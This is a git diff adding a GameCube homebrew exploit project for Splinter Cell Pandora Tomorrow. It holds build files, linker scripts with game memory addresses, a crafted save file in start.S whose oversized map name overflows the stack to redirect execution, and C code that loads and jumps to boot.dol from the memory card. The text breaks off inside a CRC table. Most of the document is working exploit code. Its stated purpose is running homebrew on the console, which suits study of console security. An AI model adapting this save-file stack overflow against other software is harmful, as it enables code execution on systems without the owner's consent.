diff --git a/Makefile b/Makefile new file mode 100644 index 0000000..6776965 --- /dev/null +++ b/Makefile @@ -0,0 +1,15 @@ +# Copyright 2016 FIX94 +# This code is licensed to you under the terms of the GNU GPL, version 2; +# see file LICENSE or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt + +all: + @$(MAKE) --no-print-directory -C loader + @mv -f loader/loader.h exploit/loader.h + @$(MAKE) --no-print-directory -C exploit + @mkdir -p gci + @mv -f exploit/*.gci gci + +clean: + @$(MAKE) --no-print-directory -C loader clean + @$(MAKE) --no-print-directory -C exploit clean + rm -rf gci diff --git a/README.md b/README.md index b41c060..7940d0d 100644 --- a/README.md +++ b/README.md @@ -1,2 +1,3 @@ # pandoratomorrow-exploit-gc -a exploit for splinter cell pandora tomorrow on gamecube +A exploit for splinter cell pandora tomorrow on gamecube, you only need a method of injecting the .gci onto your memory card. +This exploit will load a boot.dol converted with dol2gci (included in Home Bros.) from your memory card. diff --git a/exploit/Makefile b/exploit/Makefile new file mode 100644 index 0000000..714b693 --- /dev/null +++ b/exploit/Makefile @@ -0,0 +1,88 @@ +# Copyright 2008-2009 Segher Boessenkool +# GameCube Port Copyright 2016 FIX94 +# This code is licensed to you under the terms of the GNU GPL, version 2; +# see file LICENSE or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt + + +# Configuration: + +# What toolchain prefix should we use +CROSS ?= powerpc-eabi- + +ifeq ($(OS),Windows_NT) + FIXCRC = $(CURDIR)/pandoratomorrow_crc.exe +else + FIXCRC = $(CURDIR)/pandoratomorrow_crc +endif + +# End of configuration. + + + +# Set CC, LD, OBJCOPY based on CROSS, unless they are set already + +ifeq ($(origin CC), default) + CC := $(CROSS)gcc -m32 +endif +ifeq ($(origin LD), default) + LD := $(CROSS)ld +endif +OBJCOPY ?= $(CROSS)objcopy + + +# The compiler flags we need. + +CFLAGS := -Wall -W -O1 -ffreestanding -mno-eabi -mno-sdata -mcpu=750 + + +# Build with "V=1" to see the commands executed; be quiet otherwise. + +ifeq ($(V),1) + Q := +else + Q := @ + MAKEFLAGS += --no-print-directory +endif + + +targets := gt7e.gci gt7p.gci gt7x.gci +targets-short := gt7e gt7p gt7x + +objs := pandoratomorrow.o + +all: $(targets) + +$(targets): %.gci : %.dat %.hdr + @echo " OUTPUT $@" + $(Q)dd if=$(filter %.hdr,$^) of=$@ bs=1 count=16540 2>/dev/null + $(Q)dd if=$(filter %.dat,$^) of=$@ bs=1 seek=16540 count=20480 2>/dev/null + $(Q)dd if=$(filter %.hdr,$^) of=$@ bs=1 skip=37020 seek=37020 count=4004 2>/dev/null + $(Q)$(FIXCRC) $@ + +dats := gt7e.dat gt7p.dat gt7x.dat + +$(dats): %.dat: %.elf + @echo " OBJCOPY $@" + $(Q)$(OBJCOPY) -Obinary $< $@ + +elfs := $(dats:.dat=.elf) + +gt7e.elf: baddr := 0x80488E40+0x405C +gt7p.elf: baddr := 0x80489400+0x405C +gt7x.elf: baddr := 0x80489400+0x405C +$(elfs): %.elf: %.ld %.o $(objs) + @echo " LINK $@" + $(Q)$(LD) --defsym baddr=$(baddr) -T $^ -o $@ + +exploit-objs := $(elfs:.elf=.o) + +$(exploit-objs): %.o: start.S mapAfterName.bin + @echo " ASSEMBLE $@" + $(Q)$(CC) $(CFLAGS) -c $< -o $@ + +%.o: %.c + @echo " COMPILE $@" + $(Q)$(CC) $(CFLAGS) -c $< -o $@ + +clean: + -rm -f $(targets) $(saves) $(elfs) $(exploit-objs) $(objs) $(slots) $(dats) loader.h diff --git a/exploit/gt7e.hdr b/exploit/gt7e.hdr new file mode 100644 index 0000000..f6c4c32 Binary files /dev/null and b/exploit/gt7e.hdr differ diff --git a/exploit/gt7e.ld b/exploit/gt7e.ld new file mode 100644 index 0000000..eaf0aa8 --- /dev/null +++ b/exploit/gt7e.ld @@ -0,0 +1,30 @@ +/* Copyright 2008-2009 Segher Boessenkool + GameCube Port Copyright 2016 FIX94 + This code is licensed to you under the terms of the GNU GPL, version 2; + see file LICENSE or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt */ + +OUTPUT_FORMAT("elf32-powerpc") +OUTPUT_ARCH(powerpc:common) + +SECTIONS { + card_getres = 0x80315E80; + card_mountasync = 0x80319380; + card_unmount = 0x803195BC; + card_open = 0x8031A314; + card_close = 0x8031A430; + card_readasync = 0x8031AAC4; + gx_setdrawdone = 0x8032430C; + os_stopaudiosystem = 0x8032DFEC; + os_disable_scheduler = 0x80332AE0; + + .pandoratomorrow baddr : + { + gt7*.o(.start) + *(.text) + *(.rodata .rodata.*) + *(.data) + . = 0xFFC; + *(.bss) + . = 0x5000; + } +} diff --git a/exploit/gt7p.hdr b/exploit/gt7p.hdr new file mode 100644 index 0000000..a70175d Binary files /dev/null and b/exploit/gt7p.hdr differ diff --git a/exploit/gt7p.ld b/exploit/gt7p.ld new file mode 100644 index 0000000..83c72a3 --- /dev/null +++ b/exploit/gt7p.ld @@ -0,0 +1,30 @@ +/* Copyright 2008-2009 Segher Boessenkool + GameCube Port Copyright 2016 FIX94 + This code is licensed to you under the terms of the GNU GPL, version 2; + see file LICENSE or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt */ + +OUTPUT_FORMAT("elf32-powerpc") +OUTPUT_ARCH(powerpc:common) + +SECTIONS { + card_getres = 0x80316664; + card_mountasync = 0x80319B64; + card_unmount = 0x80319DA0; + card_open = 0x8031AAF8; + card_close = 0x8031AC14; + card_readasync = 0x8031B2A8; + gx_setdrawdone = 0x80324868; + os_stopaudiosystem = 0x8032E310; + os_disable_scheduler = 0x80332D5C; + + .pandoratomorrow baddr : + { + gt7*.o(.start) + *(.text) + *(.rodata .rodata.*) + *(.data) + . = 0xFFC; + *(.bss) + . = 0x5000; + } +} diff --git a/exploit/gt7x.hdr b/exploit/gt7x.hdr new file mode 100644 index 0000000..54d7836 Binary files /dev/null and b/exploit/gt7x.hdr differ diff --git a/exploit/gt7x.ld b/exploit/gt7x.ld new file mode 100644 index 0000000..83c72a3 --- /dev/null +++ b/exploit/gt7x.ld @@ -0,0 +1,30 @@ +/* Copyright 2008-2009 Segher Boessenkool + GameCube Port Copyright 2016 FIX94 + This code is licensed to you under the terms of the GNU GPL, version 2; + see file LICENSE or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt */ + +OUTPUT_FORMAT("elf32-powerpc") +OUTPUT_ARCH(powerpc:common) + +SECTIONS { + card_getres = 0x80316664; + card_mountasync = 0x80319B64; + card_unmount = 0x80319DA0; + card_open = 0x8031AAF8; + card_close = 0x8031AC14; + card_readasync = 0x8031B2A8; + gx_setdrawdone = 0x80324868; + os_stopaudiosystem = 0x8032E310; + os_disable_scheduler = 0x80332D5C; + + .pandoratomorrow baddr : + { + gt7*.o(.start) + *(.text) + *(.rodata .rodata.*) + *(.data) + . = 0xFFC; + *(.bss) + . = 0x5000; + } +} diff --git a/exploit/mapAfterName.bin b/exploit/mapAfterName.bin new file mode 100644 index 0000000..48c5da3 Binary files /dev/null and b/exploit/mapAfterName.bin differ diff --git a/exploit/pandoratomorrow.c b/exploit/pandoratomorrow.c new file mode 100644 index 0000000..6c28f6f --- /dev/null +++ b/exploit/pandoratomorrow.c @@ -0,0 +1,143 @@ +// Copyright 2008-2009 Segher Boessenkool +// GameCube Port Copyright 2016 FIX94 +// This code is licensed to you under the terms of the GNU GPL, version 2; +// see file LICENSE or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt + +#include "loader.h" + +#define TO_ARAM 0 +#define TO_MRAM 1 + +typedef unsigned int u32; +typedef unsigned short u16; +typedef unsigned char u8; +typedef volatile unsigned int vu32; +typedef volatile unsigned short vu16; + +typedef struct _cInfo +{ + int chan; + int fnum; + int offset; + int length; + u16 block; +} cInfo; + +int card_getres(int chan); +int card_mountasync(int chan, void* workArea, void *cb1, void *cb2); +int card_unmount(int chan); +int card_open(int chan, const char *path, cInfo *inf); +int card_close(cInfo *inf); +int card_readasync(cInfo *inf, void* addr, int length, int offset, void *cb); +void gx_setdrawdone(void); +void os_stopaudiosystem(void); +void os_disable_scheduler(void); + +static void sync_cache(void *p, u32 n) +{ + u32 start, end; + + start = (u32)p & ~31; + end = ((u32)p + n + 31) & ~31; + n = (end - start) >> 5; + + while (n--) { + asm("dcbst 0,%0 ; icbi 0,%0" : : "b"(p)); + p += 32; + } + asm("sync ; isync"); +} + +void *_memcpy(void *ptr, const void *src, int size) +{ + char* ptr2 = ptr; + const char* src2 = src; + while(size--) *ptr2++ = *src2++; + return ptr; +} + +void os_enable_interrupts() +{ + asm("mfmsr 3 ; ori 3, 3, 0x8000 ; mtmsr 3"); +} + +void os_disable_interrupts() +{ + asm("mfmsr 3 ; rlwinm 3,3,0,17,15 ; mtmsr 3"); +} + +void ar_dma(u32 type, u32 mram, u32 aram, u32 len) +{ + //interrupts are enabled so play it safe + os_disable_interrupts(); + while(*(vu16*)0xCC00500A & 0x200) ; + *(vu16*)0xCC005020 = (mram>>16); + *(vu16*)0xCC005022 = (mram&0xFFFF); + *(vu16*)0xCC005024 = (aram>>16); + *(vu16*)0xCC005026 = (aram&0xFFFF); + *(vu16*)0xCC005028 = (type<<15)|(len>>16); + *(vu16*)0xCC00502A = (len&0xFFFF); + while(*(vu16*)0xCC00500A & 0x200) ; + os_enable_interrupts(); +} + +void __attribute__ ((noreturn)) _main() +{ + //game audio threads are still running + //so we just disable threading to prevent the + //game from randomly crashing on CARD access + os_disable_scheduler(); + //prevent BEEPing + os_stopaudiosystem(); + //use setdrawdone because the scheduler is + //already disabled to prevent audio crashes + gx_setdrawdone(); + //enable interrupts for CARD access + os_enable_interrupts(); + //game id DOLX00 for boot.dol + *(volatile u32*)0x80000000 = 0x444F4C58; + *(volatile u16*)0x80000004 = 0x3030; + sync_cache((void*)0x80000000, 6); + //re-mount the memory card + card_mountasync(0, (void*)0x81200000, (void*)0, (void*)0); + int res; + //we have interrupts enabled so we will + //know when its not busy anymore luckily + while((res = card_getres(0)) == -1) ; + //open up boot.dol from memory card + cInfo mInf; + unsigned int boot_str[3]; boot_str[0] = 0x626F6F74; + boot_str[1] = 0x2E646F6C; boot_str[2] = 0; + card_open(0, ((char*)&boot_str), &mInf); + u32 curOffset = 0; + //copy until it returns error + while(card_readasync(&mInf, (void*)0x80001800, 0x200, curOffset, (void*)0) == 0) + { + int res; + //we have interrupts enabled so we will + //know when its not busy anymore luckily + while((res = card_getres(0)) == -1) ; + //this indirectly tells us the file is done + if(res < 0) + break; + sync_cache((void*)0x80001800, 0x200); + ar_dma(TO_ARAM, 0x1800, curOffset, 0x200); + curOffset += 0x200; + } + //we are done + card_close(&mInf); + card_unmount(0); + //not needed anymore + os_disable_interrupts(); + //copy our loader into mem + _memcpy((void*)0x80001800, loader, loader_size); + sync_cache((void*)0x80001800, loader_size); + //jump to it + __asm__ volatile( + "lis 3, 0x8000\n" + "ori 3, 3, 0x1800\n" + "mtlr 3\n" + "blr\n" + ); + __builtin_unreachable(); +} diff --git a/exploit/pandoratomorrow_crc.exe b/exploit/pandoratomorrow_crc.exe new file mode 100644 index 0000000..2c28ad7 Binary files /dev/null and b/exploit/pandoratomorrow_crc.exe differ diff --git a/exploit/start.S b/exploit/start.S new file mode 100644 index 0000000..df9ab65 --- /dev/null +++ b/exploit/start.S @@ -0,0 +1,29 @@ +// Copyright 2008-2009 Segher Boessenkool +// GameCube Port Copyright 2016 FIX94 +// This code is licensed to you under the terms of the GNU GPL, version 2; +// see file LICENSE or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt + +#define XSTR(x) #x +#define ISTR(x) XSTR(x) + + .section .start,"ax" + + // Map Name string size, choose one that overflows stack + .short 0x22C + // Fill up Map Name + .fill 0x228,1,'A' + // Pointer to our code + .long start + // Further save info, not sure if needed + .incbin "mapAfterName.bin" + // Alignment + .short 0 + // Fill up so game does not interpret code below as 2nd save info + .fill 0x4B0,1,0x00 + +start: + // Disable interrupts + mfmsr 3 ; rlwinm 3,3,0,17,15 ; mtmsr 3 + + // Go for it! + b _main diff --git a/loader/Makefile b/loader/Makefile new file mode 100644 index 0000000..663383f --- /dev/null +++ b/loader/Makefile @@ -0,0 +1,60 @@ +# Copyright 2008-2009 Segher Boessenkool +# GameCube Port Copyright 2016 FIX94 +# This code is licensed to you under the terms of the GNU GPL, version 2; +# see file LICENSE or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt + + +# Configuration: + +# What toolchain prefix should we use +CROSS ?= powerpc-eabi- + +# Where are the tools (http://git.infradead.org/users/segher/wii.git) +TOOLS ?= C:\segher_wii_tools + +ifeq ($(OS),Windows_NT) + BIN2H = bin2h/bin2h.exe +else + BIN2H = bin2h/bin2h +endif + +# End of configuration. + + +# Set CC, LD, OBJCOPY based on CROSS, unless they are set already + +ifeq ($(origin CC), default) + CC := $(CROSS)gcc -m32 +endif +ifeq ($(origin LD), default) + LD := $(CROSS)ld +endif +OBJCOPY ?= $(CROSS)objcopy + +# The compiler flags we need. + +CFLAGS := -Wall -W -O1 -ffreestanding -mno-eabi -mno-sdata -mcpu=750 + +# Build with "V=1" to see the commands executed; be quiet otherwise. + +ifeq ($(V),1) + Q := +else + Q := @ + MAKEFLAGS += --no-print-directory +endif + +all: + @echo " ASSEMBLE start.o" + $(Q)$(CC) $(CFLAGS) -c start.S -o start.o + @echo " COMPILE loader.o" + $(Q)$(CC) $(CFLAGS) -c loader.c -o loader.o + @echo " LINK loader.elf" + $(Q)$(LD) start.o loader.o -T loader.ld -o loader.elf + @echo " OBJCOPY loader.bin" + $(Q)$(OBJCOPY) -Obinary loader.elf loader.bin + @echo " OUTPUT loader.h" + $(Q)$(BIN2H) loader.bin + +clean: + -rm -f start.o loader.o loader.elf loader.bin loader.h diff --git a/loader/bin2h/bin2h b/loader/bin2h/bin2h new file mode 100644 index 0000000..a84bed9 Binary files /dev/null and b/loader/bin2h/bin2h differ diff --git a/loader/bin2h/bin2h.exe b/loader/bin2h/bin2h.exe new file mode 100644 index 0000000..200ce15 Binary files /dev/null and b/loader/bin2h/bin2h.exe differ diff --git a/loader/bin2h/main.c b/loader/bin2h/main.c new file mode 100644 index 0000000..fd80a7d --- /dev/null +++ b/loader/bin2h/main.c @@ -0,0 +1,84 @@ +/* +bin2h for Nintendont (Kernel) + +Copyright (C) 2014 FIX94 + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU General Public License +as published by the Free Software Foundation version 2. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. +*/ +#include +#include +#include +#include +int main (int argc, char **argv) +{ + if(argc < 2 || strrchr(argv[1], '.') == NULL || strcmp(".bin", strrchr(argv[1], '.')) != 0) + return 0; + /* read in file */ + FILE *f = fopen(argv[1], "rb"); + if(f == NULL) + return 0; + fseek(f,0,SEEK_END); + size_t fsize = ftell(f); + rewind(f); + unsigned char *bin = (unsigned char*)malloc(fsize); + fread(bin,fsize,1,f); + fclose(f); + /* new .h file */ + size_t newnamelen = strrchr(argv[1], '.') - argv[1]; + char *newname = calloc(newnamelen+3, sizeof(char)); + strncpy(newname, argv[1], newnamelen); + strcpy(newname + newnamelen, ".h"); + + /* name for the .h content */ + size_t basenamelen = newnamelen; + if(strchr(argv[1], '/') != NULL) + basenamelen -= (strrchr(argv[1], '/')+1 - argv[1]); + + char *basename = calloc(basenamelen+1, sizeof(char)); + if(strchr(argv[1], '/') != NULL) + strncpy(basename, strrchr(argv[1], '/')+1, basenamelen); + else + strncpy(basename, argv[1], basenamelen); + + /* get creation time */ + time_t curtime = time (NULL); + struct tm *loctime = localtime (&curtime); + /* create .h file */ + f = fopen(newname, "w"); + free(newname); + fputs("/*\n",f); + fprintf(f,"\tFilename : %s\n", strchr(argv[1], '/') != NULL ? strrchr(argv[1], '/')+1 : argv[1]); + fprintf(f,"\tDate created: %s", asctime(loctime)); + fputs("*/\n\n",f); + fprintf(f,"#define %s_size 0x%x\n\n",basename,fsize); + fprintf(f,"const unsigned char %s[] = {",basename); + free(basename); + + size_t i = 0; + while(i < fsize) + { + if((i % 16) == 0) + fputs("\n",f); + if((i % 4) == 0) + fputs("\t",f); + fprintf(f,"0x%02X", *(bin+i)); + i++; + if(i < fsize) + fputs(", ",f); + } + fprintf(f,"\n};\n"); + fclose(f); + free(bin); + return 0; +} diff --git a/loader/bin2h/make.cmd b/loader/bin2h/make.cmd new file mode 100644 index 0000000..6556691 --- /dev/null +++ b/loader/bin2h/make.cmd @@ -0,0 +1,2 @@ +gcc main.c -s -Os -static -o bin2h.exe +pause \ No newline at end of file diff --git a/loader/bin2h/make.sh b/loader/bin2h/make.sh new file mode 100644 index 0000000..963b14a --- /dev/null +++ b/loader/bin2h/make.sh @@ -0,0 +1,2 @@ +gcc main.c -m32 -s -Os -static -o bin2h +chmod a+x bin2h diff --git a/loader/loader.c b/loader/loader.c new file mode 100644 index 0000000..dc9038f --- /dev/null +++ b/loader/loader.c @@ -0,0 +1,137 @@ +// Copyright 2008-2009 Segher Boessenkool +// GameCube Port Copyright 2016 FIX94 +// This code is licensed to you under the terms of the GNU GPL, version 2; +// see file LICENSE or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt + +typedef unsigned int u32; +typedef unsigned short u16; +typedef unsigned char u8; + +typedef struct _dolheader { + u32 text_pos[7]; + u32 data_pos[11]; + u32 text_start[7]; + u32 data_start[11]; + u32 text_size[7]; + u32 data_size[11]; + u32 bss_start; + u32 bss_size; + u32 entry_point; +} dolheader; + +static u8 dolData[0x200] __attribute__ ((aligned(32))); + +#define vu16 volatile unsigned short +#define TO_ARAM 0 +#define TO_MRAM 1 +void ar_dma(u32 type, u32 mram, u32 aram, u32 len) +{ + *(vu16*)0xcc005020 = (mram>>16); + *(vu16*)0xcc005022 = (mram&0xFFFF); + *(vu16*)0xcc005024 = (aram>>16); + *(vu16*)0xcc005026 = (aram&0xFFFF); + *(vu16*)0xcc005028 = (type<<15)|(len>>16); + *(vu16*)0xcc00502A = (len&0xFFFF); + while(*(vu16*)0xcc00500A & 0x200) ; +} + +static void sync_cache(void *p, u32 n) +{ + u32 start, end; + + start = (u32)p & ~31; + end = ((u32)p + n + 31) & ~31; + n = (end - start) >> 5; + + while (n--) { + asm("dcbst 0,%0 ; icbi 0,%0" : : "b"(p)); + p += 32; + } + asm("sync ; isync"); +} + +static void sync_before_read(void *p, u32 n) +{ + u32 start, end; + + start = (u32)p & ~31; + end = ((u32)p + n + 31) & ~31; + n = (end - start) >> 5; + + while (n--) { + asm("dcbf 0,%0" : : "b"(p)); + p += 32; + } + asm("sync"); +} + +void *_memset(void *ptr, int c, int size) { + char* ptr2 = ptr; + while(size--) *ptr2++ = (char)c; + return ptr; +} + +void *_memcpy(void *ptr, const void *src, int size) { + char* ptr2 = ptr; + const char* src2 = src; + while(size--) *ptr2++ = *src2++; + return ptr; +} + +void readAlign(u8* bufPos, u32 length, u32 unalignedOffset) +{ + u32 alignedOffset = unalignedOffset & (~0x1FF); + u32 offsetDiff = unalignedOffset - alignedOffset; + + if(offsetDiff > 0) + { + sync_before_read(dolData, 0x200); + ar_dma(TO_MRAM, (u32)dolData, alignedOffset, 0x200); + u32 write = ((length > 0x200) ? 0x200 : length) - offsetDiff; + _memcpy(bufPos, dolData + offsetDiff, write); + sync_cache(bufPos, write); + alignedOffset += 0x200; + bufPos += write; + length -= write; + } + + while(length > 0) + { + sync_before_read(dolData, 0x200); + ar_dma(TO_MRAM, (u32)dolData, alignedOffset, 0x200); + u32 write = ((length > 0x200) ? 0x200 : length); + _memcpy(bufPos, dolData, write); + sync_cache(bufPos, write); + alignedOffset += 0x200; + bufPos += write; + length -= write; + } +} + +void __attribute__ ((noreturn)) _main() +{ + int i; + dolheader dolHdr; + sync_before_read(dolData, 0x200); + ar_dma(TO_MRAM, (u32)dolData, 0, 0x200); + _memcpy(&dolHdr, dolData, sizeof(dolheader)); + //write down boot.dol in memory + for (i = 0; i < 7; i++) + { + if ((!dolHdr.text_size[i]) || (dolHdr.text_start[i] < 0x100)) + continue; + readAlign((u8*)dolHdr.text_start[i], dolHdr.text_size[i], dolHdr.text_pos[i]); + } + for (i = 0; i < 11; i++) + { + if ((!dolHdr.data_size[i]) || (dolHdr.data_start[i] < 0x100)) + continue; + readAlign((u8*)dolHdr.data_start[i], dolHdr.data_size[i], dolHdr.data_pos[i]); + } + //lets jump + __asm__ volatile( + "mtlr %0\n" + "blr\n" + : : "r"(dolHdr.entry_point)); + __builtin_unreachable(); +} diff --git a/loader/loader.ld b/loader/loader.ld new file mode 100644 index 0000000..ec6eaea --- /dev/null +++ b/loader/loader.ld @@ -0,0 +1,26 @@ +/* Copyright 2008-2009 Segher Boessenkool + GameCube Port Copyright 2016 FIX94 + This code is licensed to you under the terms of the GNU GPL, version 2; + see file LICENSE or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt */ + +OUTPUT_FORMAT("elf32-powerpc") +OUTPUT_ARCH(powerpc:common) + +SECTIONS { + . = 0x80001800; + + .start : { start.o(*) } + .text : { *(.text) } + .rodata : { *(.rodata .rodata.*)} + .data : { *(.data) } + + __bss_start = .; + .bss : { *(.bss) } + __bss_end = .; + + . = ALIGN(0x40); + .stack : { + . += 0x800; + _stack_top = .; + } +} diff --git a/loader/start.S b/loader/start.S new file mode 100644 index 0000000..4e009ef --- /dev/null +++ b/loader/start.S @@ -0,0 +1,24 @@ +// Copyright 2008-2009 Segher Boessenkool +// GameCube Port Copyright 2016 FIX94 +// This code is licensed to you under the terms of the GNU GPL, version 2; +// see file LICENSE or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt + +.extern _memset +.extern _main +.globl _start +_start: + + # Disable interrupts, enable FP. + mfmsr 3 ; rlwinm 3,3,0,17,15 ; ori 3,3,0x2000 ; mtmsr 3 ; isync + + # Setup stack. + lis 1,_stack_top@ha ; addi 1,1,_stack_top@l ; li 0,0 ; stwu 0,-64(1) + + # Clear BSS. + lis 3,__bss_start@ha ; addi 3,3,__bss_start@l + li 4,0 + lis 5,__bss_end@ha ; addi 5,5,__bss_end@l ; sub 5,5,3 + bl _memset + + # Go! + b _main \ No newline at end of file diff --git a/pandoratomorrow_crc/build.bat b/pandoratomorrow_crc/build.bat new file mode 100644 index 0000000..0c8aea3 --- /dev/null +++ b/pandoratomorrow_crc/build.bat @@ -0,0 +1,2 @@ +gcc -Wall -O3 -s -static crc32.c main.c -o pandoratomorrow_crc.exe +pause \ No newline at end of file diff --git a/pandoratomorrow_crc/crc32.c b/pandoratomorrow_crc/crc32.c new file mode 100644 index 0000000..5546a5e --- /dev/null +++ b/pandoratomorrow_crc/crc32.c @@ -0,0 +1,112 @@ + +/* Copyright (C) 1986 Gary S. Brown. You may use this program, or + code or tables extracted from it, as desired without restriction.*/ + +/* First, the polynomial itself and its table of feedback terms. The */ +/* polynomial is */ +/* X^32+X^26+X^23+X^22+X^16+X^12+X^11+X^10+X^8+X^7+X^5+X^4+X^2+X^1+X^0 */ +/* Note that we take it "backwards" and put the highest-order term in */ +/* the lowest-order bit. The X^32 term is "implied"; the LSB is the */ +/* X^31 term, etc. The X^0 term (usually shown as "+1") results in */ +/* the MSB being 1. */ + +/* Note that the usual hardware shift register implementation, which */ +/* is what we're using (we're merely optimizing it by doing eight-bit */ +/* chunks at a time) shifts bits into the lowest-order term. In our */ +/* implementation, that means shifting towards the right. Why do we */ +/* do it this way? Because the calculated CRC must be transmitted in */ +/* order from highest-order term to lowest-order term. UARTs transmit */ +/* characters in order from LSB to MSB. By storing the CRC this way, */ +/* we hand it to the UART in the order low-byte to high-byte; the UART */ +/* sends each low-bit to hight-bit; and the result is transmission bit */ +/* by bit from highest- to lowest-order term without requiring any bit */ +/* shuffling on our part. Reception works similarly. */ + +/* The feedback terms table consists of 256, 32-bit entries. Notes: */ +/* */ +/* 1. The table can be generated at runtime if desired; code to do so */ +/* is shown later. It might not be obvious, but the feedback */ +/* terms simply represent the results of eight shift/xor opera- */ +/* tions for all combinations of data and CRC register values. */ +/* */ +/* 2. The CRC accumulation logic is the same for all CRC polynomials, */ +/* be they sixteen or thirty-two bits wide. You simply choose the */ +/* appropriate table. Alternatively, because the table can be */ +/* generated at runtime, you can start by generating the table for */ +/* the polynomial in question and use exactly the same "updcrc", */ +/* if your application needn't simultaneously handle two CRC */ +/* polynomials. (Note, however, that XMODEM is strange.) */ +/* */ +/* 3. For 16-bit CRCs, the table entries need be only 16 bits wide; */ +/* of course, 32-bit entries work OK if the high 16 bits are zero. */ +/* */ +/* 4. The values must be right-shifted by eight bits by the "updcrc" */ +/* logic; the shift must be unsigned (bring in zeroes). On some */ +/* hardware you could probably optimize the shift in assembler by */ +/* using byte-swap instructions. */ + +#include +#include "crc32.h" + +#define FILEBUFFER 0x200000 /* 2MB */ + +static unsigned int crc_32_tab[] = { /* CRC polynomial 0xedb88320 */ + 0x00000000, 0x77073096, 0xee0e612c, 0x990951ba, 0x076dc419, 0x706af48f, + 0xe963a535, 0x9e6495a3, 0x0edb8832, 0x79dcb8a4, 0xe0d5e91e, 0x97d2d988, + 0x09b64c2b, 0x7eb17cbd, 0xe7b82d07, 0x90bf1d91, 0x1db71064, 0x6ab020f2, + 0xf3b97148, 0x84be41de, 0x1adad47d, 0x6ddde4eb, 0xf4d4b551, 0x83d385c7, + 0x136c9856, 0x646ba8c0, 0xfd62f97a, 0x8a65c9ec, 0x14015c4f, 0x63066cd9, + 0xfa0f3d63, 0x8d080df5, 0x3b6e20c8, 0x4c69105e, 0xd56041e4, 0xa2677172, + 0x3c03e4d1, 0x4b04d447, 0xd20d85fd, 0xa50ab56b, 0x35b5a8fa, 0x42b2986c, + 0xdbbbc9d6, 0xacbcf940, 0x32d86ce3, 0x45df5c75, 0xdcd60dcf, 0xabd13d59, + 0x26d930ac, 0x51de003a, 0xc8d75180, 0xbfd06116, 0x21b4f4b5, 0x56b3c423, + 0xcfba9599, 0xb8bda50f, 0x2802b89e, 0x5f058808, 0xc60cd9b2, 0xb10be924, + 0x2f6f7c87, 0x58684c11, 0xc1611dab, 0xb6662d3d, 0x76dc4190, 0x01db7106, + 0x98d220bc, 0xefd5102a, 0x71b18589, 0x06b6b51f, 0x9fbfe4a5, 0xe8b8d433, + 0x7807c9a2, 0x0f00f934, 0x9609a88e, 0xe10e9818, 0x7f6a0dbb, 0x086d3d2d, + 0x91646c97, 0xe6635c01, 0x6b6b51f4, 0x1c6c6162, 0x856530d8, 0xf262004e, + 0x6c0695ed, 0x1b01a57b, 0x8208f4c1, 0xf50fc457, 0x65b0d9c6, 0x12b7e950, + 0x8bbeb8ea, 0xfcb9887c, 0x62dd1ddf, 0x15da2d49, 0x8cd37cf3, 0xfbd44c65, + 0x4db26158, 0x3ab551ce, 0xa3bc0074, 0xd4bb30e2, 0x4adfa541, 0x3dd895d7, + 0xa4d1c46d, 0xd3d6f4fb, 0x4369e96a, 0x346ed9fc, 0xad678846, 0xda60b8d0, + 0x44042d73, 0x33031de5, 0xaa0a4c5f, 0xdd0d7cc9, 0x5005713c, 0x270241aa, + 0xbe0b1010, 0xc90c2086, 0x5768b525, 0x206f85b3, 0xb966d409, 0xce61e49f, + 0x5edef90e, 0x29d9c998, 0xb0d09822, 0xc7d7a8b4, 0x59b33d17, 0x2eb40d81, + 0xb7bd5c3b, 0xc0ba6cad, 0xedb88320, 0x9abfb3b6, 0x03b6e20c, 0x74b1d29a, + 0xead54739, 0x9dd277af, 0x04db2615, 0x73dc1683, 0xe3630b12, 0x94643b84, + 0x0d6d6a3e, 0x7a6a5aa8, 0xe40ecf0b, 0x9309ff9d, 0x0a00ae27, 0x7d079eb1, + 0xf00f9344, 0x8708a3d2, 0x1e01f268, 0x6906c2fe, 0xf762575d, 0x806567cb, + 0x196c3671, 0x6e6b06e7, 0xfed41b76, 0x89d32be0, 0x10da7a5a, 0x67dd4acc, + 0xf9b9df6f, 0x8ebeeff9, 0x17b7be43, 0x60b08ed5, 0xd6d6a3e8, 0xa1d1937e, + 0x38d8c2c4, 0x4fdff252, 0xd1bb67f1, 0xa6bc5767, 0x3fb506dd, 0x48b2364b, + 0xd80d2bda, 0xaf0a1b4c, 0x36034af6, 0x41047a60, 0xdf60efc3, 0xa867df55, + 0x316e8eef, 0x4669be79, 0xcb61b38c, 0xbc66831a, 0x256fd2a0, 0x5268e236, + 0xcc0c7795, 0xbb0b4703, 0x220216b9, 0x5505262f, 0xc5ba3bbe, 0xb2bd0b28, + 0x2bb45a92, 0x5cb36a04, 0xc2d7ffa7, 0xb5d0cf31, 0x2cd99e8b, 0x5bdeae1d, + 0x9b64c2b0, 0xec63f226, 0x756aa39c, 0x026d930a, 0x9c0906a9, 0xeb0e363f, + 0x72076785, 0x05005713, 0x95bf4a82, 0xe2b87a14, 0x7bb12bae, 0x0cb61b38, + 0x92d28e9b, 0xe5d5be0d, 0x7cdcefb7, 0x0bdbdf21, 0x86d3d2d4, 0xf1d4e242, + 0x68ddb3f8, 0x1fda836e, 0x81be16cd, 0xf6b9265b, 0x6fb077e1, 0x18b74777, + 0x88085ae6, 0xff0f6a70, 0x66063bca, 0x11010b5c, 0x8f659eff, 0xf862ae69, + 0x616bffd3, 0x166ccf45, 0xa00ae278, 0xd70dd2ee, 0x4e048354, 0x3903b3c2, + 0xa7672661, 0xd06016f7, 0x4969474d, 0x3e6e77db, 0xaed16a4a, 0xd9d65adc, + 0x40df0b66, 0x37d83bf0, 0xa9bcae53, 0xdebb9ec5, 0x47b2cf7f, 0x30b5ffe9, + 0xbdbdf21c, 